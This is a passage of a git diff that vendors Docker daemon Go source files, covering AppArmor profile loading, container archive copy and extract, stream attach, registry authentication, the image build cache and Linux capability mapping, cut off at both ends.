+sudo docker -H 0.0.0.0:2375 < commands for docker >
+```
diff --git a/vendor/github.com/docker/docker/daemon/apparmor_default.go b/vendor/github.com/docker/docker/daemon/apparmor_default.go
new file mode 100644
index 0000000000..09dd0541b8
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/apparmor_default.go
@@ -0,0 +1,36 @@
+// +build linux
+
+package daemon
+
+import (
+	"fmt"
+
+	aaprofile "github.com/docker/docker/profiles/apparmor"
+	"github.com/opencontainers/runc/libcontainer/apparmor"
+)
+
+// Define constants for native driver
+const (
+	defaultApparmorProfile = "docker-default"
+)
+
+func ensureDefaultAppArmorProfile() error {
+	if apparmor.IsEnabled() {
+		loaded, err := aaprofile.IsLoaded(defaultApparmorProfile)
+		if err != nil {
+			return fmt.Errorf("Could not check if %s AppArmor profile was loaded: %s", defaultApparmorProfile, err)
+		}
+
+		// Nothing to do.
+		if loaded {
+			return nil
+		}
+
+		// Load the profile.
+		if err := aaprofile.InstallDefault(defaultApparmorProfile); err != nil {
+			return fmt.Errorf("AppArmor enabled on system but the %s profile could not be loaded.", defaultApparmorProfile)
+		}
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/apparmor_default_unsupported.go b/vendor/github.com/docker/docker/daemon/apparmor_default_unsupported.go
new file mode 100644
index 0000000000..cd2dd9702e
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/apparmor_default_unsupported.go
@@ -0,0 +1,7 @@
+// +build !linux
+
+package daemon
+
+func ensureDefaultAppArmorProfile() error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/archive.go b/vendor/github.com/docker/docker/daemon/archive.go
new file mode 100644
index 0000000000..1999f1243b
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/archive.go
@@ -0,0 +1,436 @@
+package daemon
+
+import (
+	"errors"
+	"io"
+	"os"
+	"path/filepath"
+	"strings"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/builder"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/chrootarchive"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/system"
+)
+
+// ErrExtractPointNotDirectory is used to convey that the operation to extract
+// a tar archive to a directory in a container has failed because the specified
+// path does not refer to a directory.
+var ErrExtractPointNotDirectory = errors.New("extraction point is not a directory")
+
+// ContainerCopy performs a deprecated operation of archiving the resource at
+// the specified path in the container identified by the given name.
+func (daemon *Daemon) ContainerCopy(name string, res string) (io.ReadCloser, error) {
+	container, err := daemon.GetContainer(name)
+	if err != nil {
+		return nil, err
+	}
+
+	if res[0] == '/' || res[0] == '\\' {
+		res = res[1:]
+	}
+
+	return daemon.containerCopy(container, res)
+}
+
+// ContainerStatPath stats the filesystem resource at the specified path in the
+// container identified by the given name.
+func (daemon *Daemon) ContainerStatPath(name string, path string) (stat *types.ContainerPathStat, err error) {
+	container, err := daemon.GetContainer(name)
+	if err != nil {
+		return nil, err
+	}
+
+	return daemon.containerStatPath(container, path)
+}
+
+// ContainerArchivePath creates an archive of the filesystem resource at the
+// specified path in the container identified by the given name. Returns a
+// tar archive of the resource and whether it was a directory or a single file.
+func (daemon *Daemon) ContainerArchivePath(name string, path string) (content io.ReadCloser, stat *types.ContainerPathStat, err error) {
+	container, err := daemon.GetContainer(name)
+	if err != nil {
+		return nil, nil, err
+	}
+
+	return daemon.containerArchivePath(container, path)
+}
+
+// ContainerExtractToDir extracts the given archive to the specified location
+// in the filesystem of the container identified by the given name. The given
+// path must be of a directory in the container. If it is not, the error will
+// be ErrExtractPointNotDirectory. If noOverwriteDirNonDir is true then it will
+// be an error if unpacking the given content would cause an existing directory
+// to be replaced with a non-directory and vice versa.
+func (daemon *Daemon) ContainerExtractToDir(name, path string, noOverwriteDirNonDir bool, content io.Reader) error {
+	container, err := daemon.GetContainer(name)
+	if err != nil {
+		return err
+	}
+
+	return daemon.containerExtractToDir(container, path, noOverwriteDirNonDir, content)
+}
+
+// containerStatPath stats the filesystem resource at the specified path in this
+// container. Returns stat info about the resource.
+func (daemon *Daemon) containerStatPath(container *container.Container, path string) (stat *types.ContainerPathStat, err error) {
+	container.Lock()
+	defer container.Unlock()
+
+	if err = daemon.Mount(container); err != nil {
+		return nil, err
+	}
+	defer daemon.Unmount(container)
+
+	err = daemon.mountVolumes(container)
+	defer container.DetachAndUnmount(daemon.LogVolumeEvent)
+	if err != nil {
+		return nil, err
+	}
+
+	resolvedPath, absPath, err := container.ResolvePath(path)
+	if err != nil {
+		return nil, err
+	}
+
+	return container.StatPath(resolvedPath, absPath)
+}
+
+// containerArchivePath creates an archive of the filesystem resource at the specified
+// path in this container. Returns a tar archive of the resource and stat info
+// about the resource.
+func (daemon *Daemon) containerArchivePath(container *container.Container, path string) (content io.ReadCloser, stat *types.ContainerPathStat, err error) {
+	container.Lock()
+
+	defer func() {
+		if err != nil {
+			// Wait to unlock the container until the archive is fully read
+			// (see the ReadCloseWrapper func below) or if there is an error
+			// before that occurs.
+			container.Unlock()
+		}
+	}()
+
+	if err = daemon.Mount(container); err != nil {
+		return nil, nil, err
+	}
+
+	defer func() {
+		if err != nil {
+			// unmount any volumes
+			container.DetachAndUnmount(daemon.LogVolumeEvent)
+			// unmount the container's rootfs
+			daemon.Unmount(container)
+		}
+	}()
+
+	if err = daemon.mountVolumes(container); err != nil {
+		return nil, nil, err
+	}
+
+	resolvedPath, absPath, err := container.ResolvePath(path)
+	if err != nil {
+		return nil, nil, err
+	}
+
+	stat, err = container.StatPath(resolvedPath, absPath)
+	if err != nil {
+		return nil, nil, err
+	}
+
+	// We need to rebase the archive entries if the last element of the
+	// resolved path was a symlink that was evaluated and is now different
+	// than the requested path. For example, if the given path was "/foo/bar/",
+	// but it resolved to "/var/lib/docker/containers/{id}/foo/baz/", we want
+	// to ensure that the archive entries start with "bar" and not "baz". This
+	// also catches the case when the root directory of the container is
+	// requested: we want the archive entries to start with "/" and not the
+	// container ID.
+	data, err := archive.TarResourceRebase(resolvedPath, filepath.Base(absPath))
+	if err != nil {
+		return nil, nil, err
+	}
+
+	content = ioutils.NewReadCloserWrapper(data, func() error {
+		err := data.Close()
+		container.DetachAndUnmount(daemon.LogVolumeEvent)
+		daemon.Unmount(container)
+		container.Unlock()
+		return err
+	})
+
+	daemon.LogContainerEvent(container, "archive-path")
+
+	return content, stat, nil
+}
+
+// containerExtractToDir extracts the given tar archive to the specified location in the
+// filesystem of this container. The given path must be of a directory in the
+// container. If it is not, the error will be ErrExtractPointNotDirectory. If
+// noOverwriteDirNonDir is true then it will be an error if unpacking the
+// given content would cause an existing directory to be replaced with a non-
+// directory and vice versa.
+func (daemon *Daemon) containerExtractToDir(container *container.Container, path string, noOverwriteDirNonDir bool, content io.Reader) (err error) {
+	container.Lock()
+	defer container.Unlock()
+
+	if err = daemon.Mount(container); err != nil {
+		return err
+	}
+	defer daemon.Unmount(container)
+
+	err = daemon.mountVolumes(container)
+	defer container.DetachAndUnmount(daemon.LogVolumeEvent)
+	if err != nil {
+		return err
+	}
+
+	// Check if a drive letter supplied, it must be the system drive. No-op except on Windows
+	path, err = system.CheckSystemDriveAndRemoveDriveLetter(path)
+	if err != nil {
+		return err
+	}
+
+	// The destination path needs to be resolved to a host path, with all
+	// symbolic links followed in the scope of the container's rootfs. Note
+	// that we do not use `container.ResolvePath(path)` here because we need
+	// to also evaluate the last path element if it is a symlink. This is so
+	// that you can extract an archive to a symlink that points to a directory.
+
+	// Consider the given path as an absolute path in the container.
+	absPath := archive.PreserveTrailingDotOrSeparator(filepath.Join(string(filepath.Separator), path), path)
+
+	// This will evaluate the last path element if it is a symlink.
+	resolvedPath, err := container.GetResourcePath(absPath)
+	if err != nil {
+		return err
+	}
+
+	stat, err := os.Lstat(resolvedPath)
+	if err != nil {
+		return err
+	}
+
+	if !stat.IsDir() {
+		return ErrExtractPointNotDirectory
+	}
+
+	// Need to check if the path is in a volume. If it is, it cannot be in a
+	// read-only volume. If it is not in a volume, the container cannot be
+	// configured with a read-only rootfs.
+
+	// Use the resolved path relative to the container rootfs as the new
+	// absPath. This way we fully follow any symlinks in a volume that may
+	// lead back outside the volume.
+	//
+	// The Windows implementation of filepath.Rel in golang 1.4 does not
+	// support volume style file path semantics. On Windows when using the
+	// filter driver, we are guaranteed that the path will always be
+	// a volume file path.
+	var baseRel string
+	if strings.HasPrefix(resolvedPath, `\\?\Volume{`) {
+		if strings.HasPrefix(resolvedPath, container.BaseFS) {
+			baseRel = resolvedPath[len(container.BaseFS):]
+			if baseRel[:1] == `\` {
+				baseRel = baseRel[1:]
+			}
+		}
+	} else {
+		baseRel, err = filepath.Rel(container.BaseFS, resolvedPath)
+	}
+	if err != nil {
+		return err
+	}
+	// Make it an absolute path.
+	absPath = filepath.Join(string(filepath.Separator), baseRel)
+
+	toVolume, err := checkIfPathIsInAVolume(container, absPath)
+	if err != nil {
+		return err
+	}
+
+	if !toVolume && container.HostConfig.ReadonlyRootfs {
+		return ErrRootFSReadOnly
+	}
+
+	uid, gid := daemon.GetRemappedUIDGID()
+	options := &archive.TarOptions{
+		NoOverwriteDirNonDir: noOverwriteDirNonDir,
+		ChownOpts: &archive.TarChownOptions{
+			UID: uid, GID: gid, // TODO: should all ownership be set to root (either real or remapped)?
+		},
+	}
+	if err := chrootarchive.Untar(content, resolvedPath, options); err != nil {
+		return err
+	}
+
+	daemon.LogContainerEvent(container, "extract-to-dir")
+
+	return nil
+}
+
+func (daemon *Daemon) containerCopy(container *container.Container, resource string) (rc io.ReadCloser, err error) {
+	container.Lock()
+
+	defer func() {
+		if err != nil {
+			// Wait to unlock the container until the archive is fully read
+			// (see the ReadCloseWrapper func below) or if there is an error
+			// before that occurs.
+			container.Unlock()
+		}
+	}()
+
+	if err := daemon.Mount(container); err != nil {
+		return nil, err
+	}
+
+	defer func() {
+		if err != nil {
+			// unmount any volumes
+			container.DetachAndUnmount(daemon.LogVolumeEvent)
+			// unmount the container's rootfs
+			daemon.Unmount(container)
+		}
+	}()
+
+	if err := daemon.mountVolumes(container); err != nil {
+		return nil, err
+	}
+
+	basePath, err := container.GetResourcePath(resource)
+	if err != nil {
+		return nil, err
+	}
+	stat, err := os.Stat(basePath)
+	if err != nil {
+		return nil, err
+	}
+	var filter []string
+	if !stat.IsDir() {
+		d, f := filepath.Split(basePath)
+		basePath = d
+		filter = []string{f}
+	} else {
+		filter = []string{filepath.Base(basePath)}
+		basePath = filepath.Dir(basePath)
+	}
+	archive, err := archive.TarWithOptions(basePath, &archive.TarOptions{
+		Compression:  archive.Uncompressed,
+		IncludeFiles: filter,
+	})
+	if err != nil {
+		return nil, err
+	}
+
+	reader := ioutils.NewReadCloserWrapper(archive, func() error {
+		err := archive.Close()
+		container.DetachAndUnmount(daemon.LogVolumeEvent)
+		daemon.Unmount(container)
+		container.Unlock()
+		return err
+	})
+	daemon.LogContainerEvent(container, "copy")
+	return reader, nil
+}
+
+// CopyOnBuild copies/extracts a source FileInfo to a destination path inside a container
+// specified by a container object.
+// TODO: make sure callers don't unnecessarily convert destPath with filepath.FromSlash (Copy does it already).
+// CopyOnBuild should take in abstract paths (with slashes) and the implementation should convert it to OS-specific paths.
+func (daemon *Daemon) CopyOnBuild(cID string, destPath string, src builder.FileInfo, decompress bool) error {
+	srcPath := src.Path()
+	destExists := true
+	destDir := false
+	rootUID, rootGID := daemon.GetRemappedUIDGID()
+
+	// Work in daemon-local OS specific file paths
+	destPath = filepath.FromSlash(destPath)
+
+	c, err := daemon.GetContainer(cID)
+	if err != nil {
+		return err
+	}
+	err = daemon.Mount(c)
+	if err != nil {
+		return err
+	}
+	defer daemon.Unmount(c)
+
+	dest, err := c.GetResourcePath(destPath)
+	if err != nil {
+		return err
+	}
+
+	// Preserve the trailing slash
+	// TODO: why are we appending another path separator if there was already one?
+	if strings.HasSuffix(destPath, string(os.PathSeparator)) || destPath == "." {
+		destDir = true
+		dest += string(os.PathSeparator)
+	}
+
+	destPath = dest
+
+	destStat, err := os.Stat(destPath)
+	if err != nil {
+		if !os.IsNotExist(err) {
+			//logrus.Errorf("Error performing os.Stat on %s. %s", destPath, err)
+			return err
+		}
+		destExists = false
+	}
+
+	uidMaps, gidMaps := daemon.GetUIDGIDMaps()
+	archiver := &archive.Archiver{
+		Untar:   chrootarchive.Untar,
+		UIDMaps: uidMaps,
+		GIDMaps: gidMaps,
+	}
+
+	if src.IsDir() {
+		// copy as directory
+		if err := archiver.CopyWithTar(srcPath, destPath); err != nil {
+			return err
+		}
+		return fixPermissions(srcPath, destPath, rootUID, rootGID, destExists)
+	}
+	if decompress && archive.IsArchivePath(srcPath) {
+		// Only try to untar if it is a file and that we've been told to decompress (when ADD-ing a remote file)
+
+		// First try to unpack the source as an archive
+		// to support the untar feature we need to clean up the path a little bit
+		// because tar is very forgiving.  First we need to strip off the archive's
+		// filename from the path but this is only added if it does not end in slash
+		tarDest := destPath
+		if strings.HasSuffix(tarDest, string(os.PathSeparator)) {
+			tarDest = filepath.Dir(destPath)
+		}
+
+		// try to successfully untar the orig
+		err := archiver.UntarPath(srcPath, tarDest)
+		/*
+			if err != nil {
+				logrus.Errorf("Couldn't untar to %s: %v", tarDest, err)
+			}
+		*/
+		return err
+	}
+
+	// only needed for fixPermissions, but might as well put it before CopyFileWithTar
+	if destDir || (destExists && destStat.IsDir()) {
+		destPath = filepath.Join(destPath, src.Name())
+	}
+
+	if err := idtools.MkdirAllNewAs(filepath.Dir(destPath), 0755, rootUID, rootGID); err != nil {
+		return err
+	}
+	if err := archiver.CopyFileWithTar(srcPath, destPath); err != nil {
+		return err
+	}
+
+	return fixPermissions(srcPath, destPath, rootUID, rootGID, destExists)
+}
diff --git a/vendor/github.com/docker/docker/daemon/archive_unix.go b/vendor/github.com/docker/docker/daemon/archive_unix.go
new file mode 100644
index 0000000000..47666fe5e8
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/archive_unix.go
@@ -0,0 +1,58 @@
+// +build !windows
+
+package daemon
+
+import (
+	"os"
+	"path/filepath"
+
+	"github.com/docker/docker/container"
+)
+
+// checkIfPathIsInAVolume checks if the path is in a volume. If it is, it
+// cannot be in a read-only volume. If it  is not in a volume, the container
+// cannot be configured with a read-only rootfs.
+func checkIfPathIsInAVolume(container *container.Container, absPath string) (bool, error) {
+	var toVolume bool
+	for _, mnt := range container.MountPoints {
+		if toVolume = mnt.HasResource(absPath); toVolume {
+			if mnt.RW {
+				break
+			}
+			return false, ErrVolumeReadonly
+		}
+	}
+	return toVolume, nil
+}
+
+func fixPermissions(source, destination string, uid, gid int, destExisted bool) error {
+	// If the destination didn't already exist, or the destination isn't a
+	// directory, then we should Lchown the destination. Otherwise, we shouldn't
+	// Lchown the destination.
+	destStat, err := os.Stat(destination)
+	if err != nil {
+		// This should *never* be reached, because the destination must've already
+		// been created while untar-ing the context.
+		return err
+	}
+	doChownDestination := !destExisted || !destStat.IsDir()
+
+	// We Walk on the source rather than on the destination because we don't
+	// want to change permissions on things we haven't created or modified.
+	return filepath.Walk(source, func(fullpath string, info os.FileInfo, err error) error {
+		// Do not alter the walk root iff. it existed before, as it doesn't fall under
+		// the domain of "things we should chown".
+		if !doChownDestination && (source == fullpath) {
+			return nil
+		}
+
+		// Path is prefixed by source: substitute with destination instead.
+		cleaned, err := filepath.Rel(source, fullpath)
+		if err != nil {
+			return err
+		}
+
+		fullpath = filepath.Join(destination, cleaned)
+		return os.Lchown(fullpath, uid, gid)
+	})
+}
diff --git a/vendor/github.com/docker/docker/daemon/archive_windows.go b/vendor/github.com/docker/docker/daemon/archive_windows.go
new file mode 100644
index 0000000000..b3a1045341
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/archive_windows.go
@@ -0,0 +1,18 @@
+package daemon
+
+import "github.com/docker/docker/container"
+
+// checkIfPathIsInAVolume checks if the path is in a volume. If it is, it
+// cannot be in a read-only volume. If it  is not in a volume, the container
+// cannot be configured with a read-only rootfs.
+//
+// This is a no-op on Windows which does not support read-only volumes, or
+// extracting to a mount point inside a volume. TODO Windows: FIXME Post-TP5
+func checkIfPathIsInAVolume(container *container.Container, absPath string) (bool, error) {
+	return false, nil
+}
+
+func fixPermissions(source, destination string, uid, gid int, destExisted bool) error {
+	// chown is not supported on Windows
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/attach.go b/vendor/github.com/docker/docker/daemon/attach.go
new file mode 100644
index 0000000000..917237dd89
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/attach.go
@@ -0,0 +1,147 @@
+package daemon
+
+import (
+	"fmt"
+	"io"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/errors"
+	"github.com/docker/docker/api/types/backend"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/daemon/logger"
+	"github.com/docker/docker/pkg/stdcopy"
+	"github.com/docker/docker/pkg/term"
+)
+
+// ContainerAttach attaches to logs according to the config passed in. See ContainerAttachConfig.
+func (daemon *Daemon) ContainerAttach(prefixOrName string, c *backend.ContainerAttachConfig) error {
+	keys := []byte{}
+	var err error
+	if c.DetachKeys != "" {
+		keys, err = term.ToBytes(c.DetachKeys)
+		if err != nil {
+			return fmt.Errorf("Invalid escape keys (%s) provided", c.DetachKeys)
+		}
+	}
+
+	container, err := daemon.GetContainer(prefixOrName)
+	if err != nil {
+		return err
+	}
+	if container.IsPaused() {
+		err := fmt.Errorf("Container %s is paused. Unpause the container before attach", prefixOrName)
+		return errors.NewRequestConflictError(err)
+	}
+
+	inStream, outStream, errStream, err := c.GetStreams()
+	if err != nil {
+		return err
+	}
+	defer inStream.Close()
+
+	if !container.Config.Tty && c.MuxStreams {
+		errStream = stdcopy.NewStdWriter(errStream, stdcopy.Stderr)
+		outStream = stdcopy.NewStdWriter(outStream, stdcopy.Stdout)
+	}
+
+	var stdin io.ReadCloser
+	var stdout, stderr io.Writer
+
+	if c.UseStdin {
+		stdin = inStream
+	}
+	if c.UseStdout {
+		stdout = outStream
+	}
+	if c.UseStderr {
+		stderr = errStream
+	}
+
+	if err := daemon.containerAttach(container, stdin, stdout, stderr, c.Logs, c.Stream, keys); err != nil {
+		fmt.Fprintf(outStream, "Error attaching: %s\n", err)
+	}
+	return nil
+}
+
+// ContainerAttachRaw attaches the provided streams to the container's stdio
+func (daemon *Daemon) ContainerAttachRaw(prefixOrName string, stdin io.ReadCloser, stdout, stderr io.Writer, stream bool) error {
+	container, err := daemon.GetContainer(prefixOrName)
+	if err != nil {
+		return err
+	}
+	return daemon.containerAttach(container, stdin, stdout, stderr, false, stream, nil)
+}
+
+func (daemon *Daemon) containerAttach(c *container.Container, stdin io.ReadCloser, stdout, stderr io.Writer, logs, stream bool, keys []byte) error {
+	if logs {
+		logDriver, err := daemon.getLogger(c)
+		if err != nil {
+			return err
+		}
+		cLog, ok := logDriver.(logger.LogReader)
+		if !ok {
+			return logger.ErrReadLogsNotSupported
+		}
+		logs := cLog.ReadLogs(logger.ReadConfig{Tail: -1})
+
+	LogLoop:
+		for {
+			select {
+			case msg, ok := <-logs.Msg:
+				if !ok {
+					break LogLoop
+				}
+				if msg.Source == "stdout" && stdout != nil {
+					stdout.Write(msg.Line)
+				}
+				if msg.Source == "stderr" && stderr != nil {
+					stderr.Write(msg.Line)
+				}
+			case err := <-logs.Err:
+				logrus.Errorf("Error streaming logs: %v", err)
+				break LogLoop
+			}
+		}
+	}
+
+	daemon.LogContainerEvent(c, "attach")
+
+	//stream
+	if stream {
+		var stdinPipe io.ReadCloser
+		if stdin != nil {
+			r, w := io.Pipe()
+			go func() {
+				defer w.Close()
+				defer logrus.Debug("Closing buffered stdin pipe")
+				io.Copy(w, stdin)
+			}()
+			stdinPipe = r
+		}
+
+		waitChan := make(chan struct{})
+		if c.Config.StdinOnce && !c.Config.Tty {
+			go func() {
+				c.WaitStop(-1 * time.Second)
+				close(waitChan)
+			}()
+		}
+
+		err := <-c.Attach(stdinPipe, stdout, stderr, keys)
+		if err != nil {
+			if _, ok := err.(container.DetachError); ok {
+				daemon.LogContainerEvent(c, "detach")
+			} else {
+				logrus.Errorf("attach failed with error: %v", err)
+			}
+		}
+
+		// If we are in stdinonce mode, wait for the process to end
+		// otherwise, simply return
+		if c.Config.StdinOnce && !c.Config.Tty {
+			<-waitChan
+		}
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/auth.go b/vendor/github.com/docker/docker/daemon/auth.go
new file mode 100644
index 0000000000..f5f4d7bf24
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/auth.go
@@ -0,0 +1,13 @@
+package daemon
+
+import (
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/dockerversion"
+)
+
+// AuthenticateToRegistry checks the validity of credentials in authConfig
+func (daemon *Daemon) AuthenticateToRegistry(ctx context.Context, authConfig *types.AuthConfig) (string, string, error) {
+	return daemon.RegistryService.Auth(ctx, authConfig, dockerversion.DockerUserAgent(ctx))
+}
diff --git a/vendor/github.com/docker/docker/daemon/bindmount_solaris.go b/vendor/github.com/docker/docker/daemon/bindmount_solaris.go
new file mode 100644
index 0000000000..87bf3ef72e
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/bindmount_solaris.go
@@ -0,0 +1,5 @@
+// +build solaris
+
+package daemon
+
+const bindMountType = "lofs"
diff --git a/vendor/github.com/docker/docker/daemon/bindmount_unix.go b/vendor/github.com/docker/docker/daemon/bindmount_unix.go
new file mode 100644
index 0000000000..3966babb41
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/bindmount_unix.go
@@ -0,0 +1,5 @@
+// +build linux freebsd
+
+package daemon
+
+const bindMountType = "bind"
diff --git a/vendor/github.com/docker/docker/daemon/cache.go b/vendor/github.com/docker/docker/daemon/cache.go
new file mode 100644
index 0000000000..a2c2c137f5
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cache.go
@@ -0,0 +1,254 @@
+package daemon
+
+import (
+	"encoding/json"
+	"fmt"
+	"reflect"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/builder"
+	"github.com/docker/docker/dockerversion"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/runconfig"
+	"github.com/pkg/errors"
+)
+
+// getLocalCachedImage returns the most recent created image that is a child
+// of the image with imgID, that had the same config when it was
+// created. nil is returned if a child cannot be found. An error is
+// returned if the parent image cannot be found.
+func (daemon *Daemon) getLocalCachedImage(imgID image.ID, config *containertypes.Config) (*image.Image, error) {
+	// Loop on the children of the given image and check the config
+	getMatch := func(siblings []image.ID) (*image.Image, error) {
+		var match *image.Image
+		for _, id := range siblings {
+			img, err := daemon.imageStore.Get(id)
+			if err != nil {
+				return nil, fmt.Errorf("unable to find image %q", id)
+			}
+
+			if runconfig.Compare(&img.ContainerConfig, config) {
+				// check for the most up to date match
+				if match == nil || match.Created.Before(img.Created) {
+					match = img
+				}
+			}
+		}
+		return match, nil
+	}
+
+	// In this case, this is `FROM scratch`, which isn't an actual image.
+	if imgID == "" {
+		images := daemon.imageStore.Map()
+		var siblings []image.ID
+		for id, img := range images {
+			if img.Parent == imgID {
+				siblings = append(siblings, id)
+			}
+		}
+		return getMatch(siblings)
+	}
+
+	// find match from child images
+	siblings := daemon.imageStore.Children(imgID)
+	return getMatch(siblings)
+}
+
+// MakeImageCache creates a stateful image cache.
+func (daemon *Daemon) MakeImageCache(sourceRefs []string) builder.ImageCache {
+	if len(sourceRefs) == 0 {
+		return &localImageCache{daemon}
+	}
+
+	cache := &imageCache{daemon: daemon, localImageCache: &localImageCache{daemon}}
+
+	for _, ref := range sourceRefs {
+		img, err := daemon.GetImage(ref)
+		if err != nil {
+			logrus.Warnf("Could not look up %s for cache resolution, skipping: %+v", ref, err)
+			continue
+		}
+		cache.sources = append(cache.sources, img)
+	}
+
+	return cache
+}
+
+// localImageCache is cache based on parent chain.
+type localImageCache struct {
+	daemon *Daemon
+}
+
+func (lic *localImageCache) GetCache(imgID string, config *containertypes.Config) (string, error) {
+	return getImageIDAndError(lic.daemon.getLocalCachedImage(image.ID(imgID), config))
+}
+
+// imageCache is cache based on history objects. Requires initial set of images.
+type imageCache struct {
+	sources         []*image.Image
+	daemon          *Daemon
+	localImageCache *localImageCache
+}
+
+func (ic *imageCache) restoreCachedImage(parent, target *image.Image, cfg *containertypes.Config) (image.ID, error) {
+	var history []image.History
+	rootFS := image.NewRootFS()
+	lenHistory := 0
+	if parent != nil {
+		history = parent.History
+		rootFS = parent.RootFS
+		lenHistory = len(parent.History)
+	}
+	history = append(history, target.History[lenHistory])
+	if layer := getLayerForHistoryIndex(target, lenHistory); layer != "" {
+		rootFS.Append(layer)
+	}
+
+	config, err := json.Marshal(&image.Image{
+		V1Image: image.V1Image{
+			DockerVersion: dockerversion.Version,
+			Config:        cfg,
+			Architecture:  target.Architecture,
+			OS:            target.OS,
+			Author:        target.Author,
+			Created:       history[len(history)-1].Created,
+		},
+		RootFS:     rootFS,
+		History:    history,
+		OSFeatures: target.OSFeatures,
+		OSVersion:  target.OSVersion,
+	})
+	if err != nil {
+		return "", errors.Wrap(err, "failed to marshal image config")
+	}
+
+	imgID, err := ic.daemon.imageStore.Create(config)
+	if err != nil {
+		return "", errors.Wrap(err, "failed to create cache image")
+	}
+
+	if parent != nil {
+		if err := ic.daemon.imageStore.SetParent(imgID, parent.ID()); err != nil {
+			return "", errors.Wrapf(err, "failed to set parent for %v to %v", target.ID(), parent.ID())
+		}
+	}
+	return imgID, nil
+}
+
+func (ic *imageCache) isParent(imgID, parentID image.ID) bool {
+	nextParent, err := ic.daemon.imageStore.GetParent(imgID)
+	if err != nil {
+		return false
+	}
+	if nextParent == parentID {
+		return true
+	}
+	return ic.isParent(nextParent, parentID)
+}
+
+func (ic *imageCache) GetCache(parentID string, cfg *containertypes.Config) (string, error) {
+	imgID, err := ic.localImageCache.GetCache(parentID, cfg)
+	if err != nil {
+		return "", err
+	}
+	if imgID != "" {
+		for _, s := range ic.sources {
+			if ic.isParent(s.ID(), image.ID(imgID)) {
+				return imgID, nil
+			}
+		}
+	}
+
+	var parent *image.Image
+	lenHistory := 0
+	if parentID != "" {
+		parent, err = ic.daemon.imageStore.Get(image.ID(parentID))
+		if err != nil {
+			return "", errors.Wrapf(err, "unable to find image %v", parentID)
+		}
+		lenHistory = len(parent.History)
+	}
+
+	for _, target := range ic.sources {
+		if !isValidParent(target, parent) || !isValidConfig(cfg, target.History[lenHistory]) {
+			continue
+		}
+
+		if len(target.History)-1 == lenHistory { // last
+			if parent != nil {
+				if err := ic.daemon.imageStore.SetParent(target.ID(), parent.ID()); err != nil {
+					return "", errors.Wrapf(err, "failed to set parent for %v to %v", target.ID(), parent.ID())
+				}
+			}
+			return target.ID().String(), nil
+		}
+
+		imgID, err := ic.restoreCachedImage(parent, target, cfg)
+		if err != nil {
+			return "", errors.Wrapf(err, "failed to restore cached image from %q to %v", parentID, target.ID())
+		}
+
+		ic.sources = []*image.Image{target} // avoid jumping to different target, tuned for safety atm
+		return imgID.String(), nil
+	}
+
+	return "", nil
+}
+
+func getImageIDAndError(img *image.Image, err error) (string, error) {
+	if img == nil || err != nil {
+		return "", err
+	}
+	return img.ID().String(), nil
+}
+
+func isValidParent(img, parent *image.Image) bool {
+	if len(img.History) == 0 {
+		return false
+	}
+	if parent == nil || len(parent.History) == 0 && len(parent.RootFS.DiffIDs) == 0 {
+		return true
+	}
+	if len(parent.History) >= len(img.History) {
+		return false
+	}
+	if len(parent.RootFS.DiffIDs) >= len(img.RootFS.DiffIDs) {
+		return false
+	}
+
+	for i, h := range parent.History {
+		if !reflect.DeepEqual(h, img.History[i]) {
+			return false
+		}
+	}
+	for i, d := range parent.RootFS.DiffIDs {
+		if d != img.RootFS.DiffIDs[i] {
+			return false
+		}
+	}
+	return true
+}
+
+func getLayerForHistoryIndex(image *image.Image, index int) layer.DiffID {
+	layerIndex := 0
+	for i, h := range image.History {
+		if i == index {
+			if h.EmptyLayer {
+				return ""
+			}
+			break
+		}
+		if !h.EmptyLayer {
+			layerIndex++
+		}
+	}
+	return image.RootFS.DiffIDs[layerIndex] // validate?
+}
+
+func isValidConfig(cfg *containertypes.Config, h image.History) bool {
+	// todo: make this format better than join that loses data
+	return strings.Join(cfg.Cmd, " ") == h.CreatedBy
+}
diff --git a/vendor/github.com/docker/docker/daemon/caps/utils_unix.go b/vendor/github.com/docker/docker/daemon/caps/utils_unix.go
new file mode 100644
index 0000000000..c99485f51d
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/caps/utils_unix.go
@@ -0,0 +1,131 @@
+// +build !windows
+
+package caps
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/docker/docker/pkg/stringutils"
+	"github.com/syndtr/gocapability/capability"
+)
+
+var capabilityList Capabilities
+
+func init() {
+	last := capability.CAP_LAST_CAP
+	// hack for RHEL6 which has no /proc/sys/kernel/cap_last_cap
+	if last == capability.Cap(63) {
+		last = capability.CAP_BLOCK_SUSPEND
+	}
+	for _, cap := range capability.List() {
+		if cap > last {
+			continue
+		}
+		capabilityList = append(capabilityList,
+			&CapabilityMapping{
+				Key:   "CAP_" + strings.ToUpper(cap.String()),
+				Value: cap,
+			},
+		)
+	}
+}
+
+type (
+	// CapabilityMapping maps linux capability name to its value of capability.Cap type
+	// Capabilities is one of the security systems in Linux Security Module (LSM)
+	// framework provided by the kernel.
+	// For more details on capabilities, see http://man7.org/linux/man-pages/man7/capabilities.7.html
+	CapabilityMapping struct {
+		Key   string         `json:"key,omitempty"`
+		Value capability.Cap `json:"value,omitempty"`
